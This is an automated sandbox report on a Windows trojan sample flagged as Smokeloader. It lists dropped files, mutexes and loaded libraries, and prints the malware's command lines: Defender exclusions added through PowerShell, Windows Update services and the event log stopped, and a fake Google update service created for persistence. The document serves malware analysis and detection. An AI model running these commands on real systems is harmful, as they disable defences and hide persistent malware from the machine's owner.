                    Source: 00000000.00000002.2091301864.0000000002490000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                    Source: b4s45TboUL.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: HIIDGCGCBF.exe.0.drStatic PE information: Section: ZLIB complexity 0.9914508865747256
                    Source: HIIDGCGCBF.exe.0.drStatic PE information: Section: ZLIB complexity 1.002233956133225
                    Source: HIIDGCGCBF.exe.0.drStatic PE information: Section: ZLIB complexity 1.0413533834586466
                    Source: HIIDGCGCBF.exe.0.drStatic PE information: Section: ZLIB complexity 1.5625
                    Source: HIIDGCGCBF.exe.0.drStatic PE information: Section: ZLIB complexity 2.3333333333333335
                    Source: HIIDGCGCBF.exe.0.drStatic PE information: Section: ZLIB complexity 1.030054644808743
                    Source: HIIDGCGCBF.exe.0.drStatic PE information: Section: ZLIB complexity 1.1047619047619048
                    Source: HIIDGCGCBF.exe.0.drStatic PE information: Section: .reloc ZLIB complexity 1.5
                    Source: chrome_131[1].exe.0.drStatic PE information: Section: ZLIB complexity 0.9914508865747256
                    Source: chrome_131[1].exe.0.drStatic PE information: Section: ZLIB complexity 1.002233956133225
                    Source: chrome_131[1].exe.0.drStatic PE information: Section: ZLIB complexity 1.0413533834586466
                    Source: chrome_131[1].exe.0.drStatic PE information: Section: ZLIB complexity 1.5625
                    Source: chrome_131[1].exe.0.drStatic PE information: Section: ZLIB complexity 2.3333333333333335
                    Source: chrome_131[1].exe.0.drStatic PE information: Section: ZLIB complexity 1.030054644808743
                    Source: chrome_131[1].exe.0.drStatic PE information: Section: ZLIB complexity 1.1047619047619048
                    Source: chrome_131[1].exe.0.drStatic PE information: Section: .reloc ZLIB complexity 1.5
                    Source: updater.exe.4.drStatic PE information: Section: ZLIB complexity 0.9914508865747256
                    Source: updater.exe.4.drStatic PE information: Section: ZLIB complexity 1.002233956133225
                    Source: updater.exe.4.drStatic PE information: Section: ZLIB complexity 1.0413533834586466
                    Source: updater.exe.4.drStatic PE information: Section: ZLIB complexity 1.5625
                    Source: updater.exe.4.drStatic PE information: Section: ZLIB complexity 2.3333333333333335
                    Source: updater.exe.4.drStatic PE information: Section: ZLIB complexity 1.030054644808743
                    Source: updater.exe.4.drStatic PE information: Section: ZLIB complexity 1.1047619047619048
                    Source: updater.exe.4.drStatic PE information: Section: .reloc ZLIB complexity 1.5
                    Source: classification engineClassification label: mal100.troj.adwa.spyw.evad.winEXE@61/19@2/2
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeCode function: 0_2_00418810 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,0_2_00418810
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeCode function: 0_2_00413970 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_00413970
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\IXQGYVFQ.htmJump to behavior
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1780:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2136:120:WilError_03
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2060:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1060:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7000:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7088:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4908:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7076:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7124:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1028:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3620:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1868:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1364:120:WilError_03
                    Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6556
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5824:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6804:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5448:120:WilError_03
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_btz1cm3s.gov.ps1Jump to behavior
                    Source: b4s45TboUL.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: C:\ProgramData\HIIDGCGCBF.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: b4s45TboUL.exe, 00000000.00000002.2103193052.000000001AF68000.00000004.00000020.00020000.00000000.sdmp, b4s45TboUL.exe, 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                    Source: b4s45TboUL.exe, 00000000.00000002.2103193052.000000001AF68000.00000004.00000020.00020000.00000000.sdmp, b4s45TboUL.exe, 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                    Source: b4s45TboUL.exe, 00000000.00000002.2103193052.000000001AF68000.00000004.00000020.00020000.00000000.sdmp, b4s45TboUL.exe, 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                    Source: b4s45TboUL.exe, 00000000.00000002.2103193052.000000001AF68000.00000004.00000020.00020000.00000000.sdmp, b4s45TboUL.exe, 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                    Source: b4s45TboUL.exe, 00000000.00000002.2103193052.000000001AF68000.00000004.00000020.00020000.00000000.sdmp, b4s45TboUL.exe, 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                    Source: b4s45TboUL.exe, 00000000.00000002.2103193052.000000001AF68000.00000004.00000020.00020000.00000000.sdmp, b4s45TboUL.exe, 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
                    Source: b4s45TboUL.exe, 00000000.00000002.2103193052.000000001AF68000.00000004.00000020.00020000.00000000.sdmp, b4s45TboUL.exe, 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                    Source: b4s45TboUL.exe, 00000000.00000003.1763912209.0000000020EE9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: b4s45TboUL.exe, 00000000.00000002.2103193052.000000001AF68000.00000004.00000020.00020000.00000000.sdmp, b4s45TboUL.exe, 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                    Source: b4s45TboUL.exe, 00000000.00000002.2103193052.000000001AF68000.00000004.00000020.00020000.00000000.sdmp, b4s45TboUL.exe, 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
                    Source: b4s45TboUL.exeReversingLabs: Detection: 39%
                    Source: unknownProcess created: C:\Users\user\Desktop\b4s45TboUL.exe "C:\Users\user\Desktop\b4s45TboUL.exe"
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\ProgramData\HIIDGCGCBF.exe"
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\ProgramData\HIIDGCGCBF.exe "C:\ProgramData\HIIDGCGCBF.exe"
                    Source: C:\ProgramData\HIIDGCGCBF.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
                    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 6556 -ip 6556
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6556 -s 2568
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                    Source: C:\ProgramData\HIIDGCGCBF.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                    Source: C:\ProgramData\HIIDGCGCBF.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
                    Source: C:\ProgramData\HIIDGCGCBF.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc
                    Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\ProgramData\HIIDGCGCBF.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv
                    Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\ProgramData\HIIDGCGCBF.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits
                    Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\ProgramData\HIIDGCGCBF.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc
                    Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\ProgramData\HIIDGCGCBF.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                    Source: C:\ProgramData\HIIDGCGCBF.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                    Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\ProgramData\HIIDGCGCBF.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                    Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\ProgramData\HIIDGCGCBF.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                    Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\ProgramData\HIIDGCGCBF.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"
                    Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\ProgramData\HIIDGCGCBF.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"
                    Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\ProgramData\HIIDGCGCBF.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlog
                    Source: C:\ProgramData\HIIDGCGCBF.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"
                    Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: unknownProcess created: C:\ProgramData\Google\Chrome\updater.exe C:\ProgramData\Google\Chrome\updater.exe
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\ProgramData\HIIDGCGCBF.exe"Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\ProgramData\HIIDGCGCBF.exe "C:\ProgramData\HIIDGCGCBF.exe" Jump to behavior
                    Source: C:\ProgramData\HIIDGCGCBF.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
                    Source: C:\ProgramData\HIIDGCGCBF.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
                    Source: C:\ProgramData\HIIDGCGCBF.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvcJump to behavior
                    Source: C:\ProgramData\HIIDGCGCBF.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvcJump to behavior
                    Source: C:\ProgramData\HIIDGCGCBF.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauservJump to behavior
                    Source: C:\ProgramData\HIIDGCGCBF.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bitsJump to behavior
                    Source: C:\ProgramData\HIIDGCGCBF.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvcJump to behavior
                    Source: C:\ProgramData\HIIDGCGCBF.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0Jump to behavior
                    Source: C:\ProgramData\HIIDGCGCBF.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0Jump to behavior
                    Source: C:\ProgramData\HIIDGCGCBF.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0Jump to behavior
                    Source: C:\ProgramData\HIIDGCGCBF.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0Jump to behavior
                    Source: C:\ProgramData\HIIDGCGCBF.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"Jump to behavior
                    Source: C:\ProgramData\HIIDGCGCBF.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"Jump to behavior
                    Source: C:\ProgramData\HIIDGCGCBF.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlogJump to behavior
                    Source: C:\ProgramData\HIIDGCGCBF.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"Jump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 6556 -ip 6556Jump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6556 -s 2568Jump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeSection loaded: msimg32.dllJump to behavior
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeSection loaded: msvcr100.dllJump to behavior
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeSection loaded: rstrtmgr.dllJump to behavior
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeSection loaded: pcacli.dllJump to behavior
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeSection loaded: sfc_os.dllJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\ProgramData\HIIDGCGCBF.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: wersvc.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: windowsperformancerecordercontrol.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: weretw.dllJump to behavior
